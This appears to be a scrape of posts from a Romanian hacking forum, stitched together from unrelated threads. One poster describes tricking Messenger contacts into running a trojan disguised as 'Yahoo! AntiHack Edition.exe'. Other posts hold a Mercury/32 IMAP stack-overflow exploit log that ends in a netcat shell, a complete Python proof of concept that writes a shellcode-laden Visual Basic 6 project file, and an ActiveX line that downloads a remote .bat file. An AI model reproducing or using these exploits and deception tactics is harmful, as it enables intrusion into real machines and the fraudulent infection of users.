nullbyte

Dati naibii ESET-istii. Thanks for sharing.

Mozolla Firefox ... am folosit si Opera, dar m-am amorezat de FF.

Vezi: www.scriptlance.com www.getafreelancer.com La Web Design.

Arata a Photoshop.

Am dat sa se conecteze prin conexiunea 'Clicknet', si se conecteaza prin V(0) nush ce.. macar merge

Nu tre sa fii tero. Tre sa fii doar anarhist. Oricum nice

Nu merge cu DNS?

Lemme check.... [dau edit dak mere] [edit] mere o pla

Nu prea trebuie sa stii nimic. De exemplu, uita-ti cum am plantat un trojan undetectabil la f. multe persoane prin mess: Am redenumit fisierul ca Yahoo! AntiHack Edition.exe ...... imi aleg victima din lista, si ii spun... Vrei ceva ca Yahoo! ID-ul tau sa nu mai poata fi hackerit niciodata? Cel mai probabil raspunsul e da. Trojanul meu dadea o eroare la victima cand il pornea... M-a intrebat ce se intampla.. I-am zis ca i-am dat un program gresit, scuze... Am luat o aplicatie... Care apare si dispare instant.. I-am zis ca daca dispare e protejat... M-a crezut... Bun, dar imi trebuia IP-ul acum... Astept 5 min... Ii cer un album... Start, run, cmd, netstat -n .. aflu IP-ul... Nu mai astept sa mi se incarce niciun album nimic, bag IP-ul in trojan: Victim Online... Keep on rollin' baby

Nu gaseste cineva vreo vuln?

con nu poate fi nume de fisier sau folder... nu mere

Aoleu, e script mmorpg ce .exe vrei? :shock:

Skiddz. EDIT: http://www.hi5.com/friend/photos/displayPhotoUser.do?albumId=31211190&ownerId=33537412&currentIndex=4 Cum zicea odata cineva de pe #milw0rm , "They aren't made for this world ."

O sa fie detectabil daca ai folosit VirusTotal sau Jordi.

:twisted:

- Tot 13... Nu prea ai ce sa faci... Ma luat la cafteala unul de 17 ani ca cica i-am furat gagik(tot 13 ani)... deci no comm. PS: Braila... faimosul Vidin =]]

http://www.hackerscenter.com/downloads/search.asp?id=1038 Coduri trojani + tutoriale & carti

Renegade, de obicei rootkiturile nu se detecteaza de antispyware/virus.

Misto Nem... auzi are un hacker un ID.. format numai din cifre... cum l-a facut? Poate ne zici si noua... E unu Kingaff si nu zice nici mort Dat dracu' indianu

# Z:\Exp>mercury_SEARCH.pl 127.0.0.1 143 void ph4nt0m.org # Mercury/32 v4.52 IMAPD SEARCH command Post-Auth Stack Overflow Exploit # Found & Code by void# ph4nt0m.org # # S: * OK mercury.ph4nt0m.org IMAP4rev1 Mercury/32 v4.52 server ready. # C: pst06 LOGIN void ph4nt0m.org # S: pst06 OK LOGIN completed. # C: pst06 SELECT INBOX # S: * 0 EXISTS # S: * 0 RECENT # S: * FLAGS (\Deleted \Draft \Seen \Answered) # S: * OK [uIDVALIDITY 1190225819] UID Validity # S: * OK [uIDNEXT 1] Predicted next UID # S: * OK [PERMANENTFLAGS (\Deleted \Draft \Seen \Answered)] Settable message flag # s # S: pst06 OK [READ-WRITE] SELECT completed. # [*] Send Evil Payload ... # [+] Done! Check out cmdshell@127.0.0.1:31337. Good Luck # # Z:\Exp>nc -vv 127.0.0.1 31337 # DNS fwd/rev mismatch: localhost != GNU # localhost [127.0.0.1] 31337 (?) open # Microsoft Windows XP [°? 5.1.2600] # © °

au doamne sunt idiot

#usage: vbexploit.py FileName.vbp import sys print "--------------------------------------------------------------------------" print " [PoC_2] Microsoft Visual Basic Enterprise Edition 6.0 SP6 Code Execution " print " author: shinnai" print " mail: shinnai[at]autistici[dot]org" print " site: http://shinnai.altervista.org\n" print " based on Koshi exploit" print " http://www.milw0rm.com/exploits/4361\n" print " I try his exploit on Windows XP Pro SP2 Ita, full patched and it doesn't" print " work, but he said:\n" print ' "# ...backwards..if you don' + "'t" + ' know why, then gtfo."\n' print " ok, now I know why brotha, I got this exception:\n" print ' "Access violation when writing to [63636363]"\n' print " so I search another way to get exploit working but I need to do some" print ' changes to memory address ("00" became "20") and nop ("90" became "3F").' print " Well, here it is a PoC_2 and if it doesn't work and" + ' "you don' + "'t know why," print ' then"' + "... feel free to ask \n" print " dedicated to all Italian vb6 programmers... be safe bros" print "--------------------------------------------------------------------------" buff = "A" * 494 EIP = "\x37\x17\x8B\x60"; #call ESP from VBSCC.DLL esp, you can (or must) change as you like buff2 = "A" * 12 RW_Memory = "\x20\x20\x01\x20" #patched writeable memory address "\x00\x00\x01\x00" nop = "\x3F\x3F\x3F\x3F" #patched nop "\x90" shellcode = \ "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+\ "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+\ "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+\ "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+\ "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"+\ "\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x47"+\ "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x54\x4a\x41\x4b\x38"+\ "\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48"+\ "\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"+\ "\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"+\ "\x46\x4f\x4b\x43\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58"+\ "\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x44"+\ "\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x38\x4e\x51\x4b\x38"+\ "\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"+\ "\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47"+\ "\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x47\x4e\x41\x4d\x4a"+\ "\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b"+\ "\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x55\x41\x33"+\ "\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37"+\ "\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x59"+\ "\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x56"+\ "\x4e\x46\x43\x56\x50\x32\x45\x46\x4a\x37\x45\x36\x42\x50\x5a" try: vb_proj = \ 'Type=Exe\n'+\ 'Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\WINDOWS'+\ '\system32\stdole2.tlb#OLE Automation' + buff + EIP + buff2 + RW_Memory + nop + shellcode + nop +\ '\nStartup="Sub Main"\n'+\ 'Command32=""\n'+\ 'Name=' + sys.argv[1]+\ '\nHelpContextID="0"\n'+\ 'CompatibleMode="0"\n'+\ 'MajorVer=1\n'+\ 'MinorVer=0\n'+\ 'RevisionVer=0\n'+\ 'AutoIncrementVer=0\n'+\ 'ServerSupportFiles=0\n'+\ 'VersionCompanyName="xxx"\n'+\ 'CompilationType=0\n'+\ 'OptimizationType=0\n'+\ 'FavorPentiumPro™=0\n'+\ 'CodeViewDebugInfo=0\n'+\ 'NoAliasing=0\n'+\ 'BoundsCheck=0\n'+\ 'OverflowCheck=0\n'+\ 'FlPointCheck=0\n'+\ 'FDIVCheck=0\n'+\ 'UnroundedFP=0\n'+\ 'StartMode=0\n'+\ 'Unattended=0\n'+\ 'Retained=0\n'+\ 'ThreadPerObject=0\n'+\ 'MaxNumberOfThreads=1\n\n'+\ '[MS Transaction Server]\n'+\ 'AutoRefresh=1' out_file = open(sys.argv[1],'w') out_file.write(vb_proj) out_file.close() print "\nFILE CREATION COMPLETED!\n" except: print " \n -------------------------------------" print " Usage: exploit.py FileName.vbp" print " -------------------------------------" print "\nAN ERROR OCCURS DURING FILE CREATION!"

Eu, personal am inteles, dar nici la scoala nu stau bine cu explicatu' Poate Ras s-a grabit sa citeasca?

test.GetFile "http://www.shinnai.altervista.org/shinnai.bat","c:\\shinnai.bat",5,1,"shinnai" Teoretic ar trebui sa deschida un cmd cu textul de la acea adresa. Pe IE6 nu merge... Pe IE7 nu am incercat :?